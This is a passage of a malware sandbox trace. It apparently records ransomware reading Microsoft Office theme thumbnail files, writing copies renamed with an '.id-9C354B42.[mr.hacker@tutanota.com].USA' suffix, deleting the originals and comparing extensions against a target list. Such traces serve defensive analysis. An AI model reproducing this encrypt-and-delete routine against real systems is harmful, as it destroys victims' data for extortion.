lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.467] SetEndOfFile (hFile=0x178) returned 1 [0047.467] CloseHandle (hObject=0x178) returned 1 [0047.467] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0047.467] SetEndOfFile (hFile=0x1f4) returned 1 [0047.468] CloseHandle (hObject=0x1f4) returned 1 [0047.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.468] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 1 [0047.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.468] lstrlenW (lpString=".doc") returned 4 [0047.468] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.468] lstrlenW (lpString=".docx") returned 5 [0047.469] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.469] lstrlenW (lpString=".pdf") returned 4 [0047.469] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.469] lstrlenW (lpString=".xls") returned 4 [0047.469] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.469] lstrlenW (lpString=".xlsx") returned 5 [0047.469] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.469] lstrlenW (lpString=".ppt") returned 4 [0047.469] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.469] lstrlenW (lpString=".zip") returned 4 [0047.469] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.469] lstrlenW (lpString=".rar") returned 4 [0047.469] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.469] lstrlenW (lpString=".bz2") returned 4 [0047.469] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.469] lstrlenW (lpString=".7z") returned 3 [0047.469] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.469] lstrlenW (lpString=".dbf") returned 4 [0047.469] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.469] lstrlenW (lpString=".1cd") returned 4 [0047.469] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.469] lstrlenW (lpString=".jpg") returned 4 [0047.469] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.469] lstrlenW (lpString=".doc") returned 4 [0047.469] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.469] lstrlenW (lpString=".docx") returned 5 [0047.469] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.469] lstrlenW (lpString=".pdf") returned 4 [0047.469] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.469] lstrlenW (lpString=".xls") returned 4 [0047.470] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.470] lstrlenW (lpString=".xlsx") returned 5 [0047.470] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.470] lstrlenW (lpString=".ppt") returned 4 [0047.470] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.470] lstrlenW (lpString=".zip") returned 4 [0047.470] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.470] lstrlenW (lpString=".rar") returned 4 [0047.470] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.470] lstrlenW (lpString=".bz2") returned 4 [0047.470] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.470] lstrlenW (lpString=".7z") returned 3 [0047.470] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.470] lstrlenW (lpString=".dbf") returned 4 [0047.470] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.471] lstrlenW (lpString=".1cd") returned 4 [0047.471] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0047.471] lstrlenW (lpString=".jpg") returned 4 [0047.471] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.471] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0047.471] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.475] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=31975) returned 1 [0048.475] CloseHandle (hObject=0x218) returned 1 [0048.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 0x20 [0048.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.476] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.476] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.476] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.476] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.476] GetLastError () returned 0x0 [0048.476] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x7ce7, lpOverlapped=0x0) returned 1 [0048.480] WriteFile (in: hFile=0x21c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x7cf0, lpOverlapped=0x0) returned 1 [0048.481] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0048.481] WriteFile (in: hFile=0x21c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.481] SetEndOfFile (hFile=0x21c) returned 1 [0048.481] CloseHandle (hObject=0x21c) returned 1 [0048.481] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.481] SetEndOfFile (hFile=0x218) returned 1 [0048.482] CloseHandle (hObject=0x218) returned 1 [0048.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.483] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 1 [0048.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.483] lstrlenW (lpString=".doc") returned 4 [0048.483] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.483] lstrlenW (lpString=".docx") returned 5 [0048.483] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.483] lstrlenW (lpString=".pdf") returned 4 [0048.483] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.483] lstrlenW (lpString=".xls") returned 4 [0048.483] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.483] lstrlenW (lpString=".xlsx") returned 5 [0048.483] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.483] lstrlenW (lpString=".ppt") returned 4 [0048.483] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.483] lstrlenW (lpString=".zip") returned 4 [0048.483] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.483] lstrlenW (lpString=".rar") returned 4 [0048.483] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.483] lstrlenW (lpString=".bz2") returned 4 [0048.483] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.483] lstrlenW (lpString=".7z") returned 3 [0048.483] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.483] lstrlenW (lpString=".dbf") returned 4 [0048.483] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.483] lstrlenW (lpString=".1cd") returned 4 [0048.483] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.484] lstrlenW (lpString=".jpg") returned 4 [0048.484] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.484] lstrlenW (lpString=".doc") returned 4 [0048.484] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.484] lstrlenW (lpString=".docx") returned 5 [0048.484] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.484] lstrlenW (lpString=".pdf") returned 4 [0048.484] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.484] lstrlenW (lpString=".xls") returned 4 [0048.484] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.484] lstrlenW (lpString=".xlsx") returned 5 [0048.484] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.484] lstrlenW (lpString=".ppt") returned 4 [0048.484] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.484] lstrlenW (lpString=".zip") returned 4 [0048.484] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.485] lstrlenW (lpString=".rar") returned 4 [0048.485] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.485] lstrlenW (lpString=".bz2") returned 4 [0048.485] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.485] lstrlenW (lpString=".7z") returned 3 [0048.485] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.485] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.485] lstrlenW (lpString=".dbf") returned 4 [0048.485] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.485] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.485] lstrlenW (lpString=".1cd") returned 4 [0048.485] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.485] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.485] lstrlenW (lpString=".jpg") returned 4 [0048.485] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.485] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0048.485] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.485] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.485] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=47962) returned 1 [0048.485] CloseHandle (hObject=0x218) returned 1 [0048.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 0x20 [0048.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.486] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.486] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.486] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.486] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.486] GetLastError () returned 0x0 [0048.486] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xbb5a, lpOverlapped=0x0) returned 1 [0048.494] WriteFile (in: hFile=0x21c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xbb60, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xbb60, lpOverlapped=0x0) returned 1 [0048.497] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0048.497] WriteFile (in: hFile=0x21c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.497] SetEndOfFile (hFile=0x21c) returned 1 [0048.497] CloseHandle (hObject=0x21c) returned 1 [0048.497] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.497] SetEndOfFile (hFile=0x218) returned 1 [0048.498] CloseHandle (hObject=0x218) returned 1 [0048.498] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.499] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 1 [0048.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.499] lstrlenW (lpString=".doc") returned 4 [0048.499] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.499] lstrlenW (lpString=".docx") returned 5 [0048.499] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.499] lstrlenW (lpString=".pdf") returned 4 [0048.499] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.499] lstrlenW (lpString=".xls") returned 4 [0048.499] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.499] lstrlenW (lpString=".xlsx") returned 5 [0048.499] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.499] lstrlenW (lpString=".ppt") returned 4 [0048.499] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.499] lstrlenW (lpString=".zip") returned 4 [0048.499] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.499] lstrlenW (lpString=".rar") returned 4 [0048.499] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.499] lstrlenW (lpString=".bz2") returned 4 [0048.499] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.499] lstrlenW (lpString=".7z") returned 3 [0048.499] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.499] lstrlenW (lpString=".dbf") returned 4 [0048.499] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.500] lstrlenW (lpString=".1cd") returned 4 [0048.500] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.500] lstrlenW (lpString=".jpg") returned 4 [0048.500] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.500] lstrlenW (lpString=".doc") returned 4 [0048.500] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.500] lstrlenW (lpString=".docx") returned 5 [0048.500] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.500] lstrlenW (lpString=".pdf") returned 4 [0048.500] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.500] lstrlenW (lpString=".xls") returned 4 [0048.500] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.500] lstrlenW (lpString=".xlsx") returned 5 [0048.500] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.500] lstrlenW (lpString=".ppt") returned 4 [0048.500] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.500] lstrlenW (lpString=".zip") returned 4 [0048.500] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.500] lstrlenW (lpString=".rar") returned 4 [0048.500] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.500] lstrlenW (lpString=".bz2") returned 4 [0048.500] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.500] lstrlenW (lpString=".7z") returned 3 [0048.500] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.500] lstrlenW (lpString=".dbf") returned 4 [0048.500] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.500] lstrlenW (lpString=".1cd") returned 4 [0048.500] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0048.501] lstrlenW (lpString=".jpg") returned 4 [0048.501] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.501] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0048.501] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.502] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=34163) returned 1 [0048.502] CloseHandle (hObject=0x218) returned 1 [0048.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 0x20 [0048.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.502] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.502] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0048.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.503] GetLastError () returned 0x0 [0048.503] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x8573, lpOverlapped=0x0) returned 1 [0048.505] WriteFile (in: hFile=0x21c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x8580, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x8580, lpOverlapped=0x0) returned 1 [0048.506] ReadFile (in: hFile=0x218, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0048.506] WriteFile (in: hFile=0x21c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, 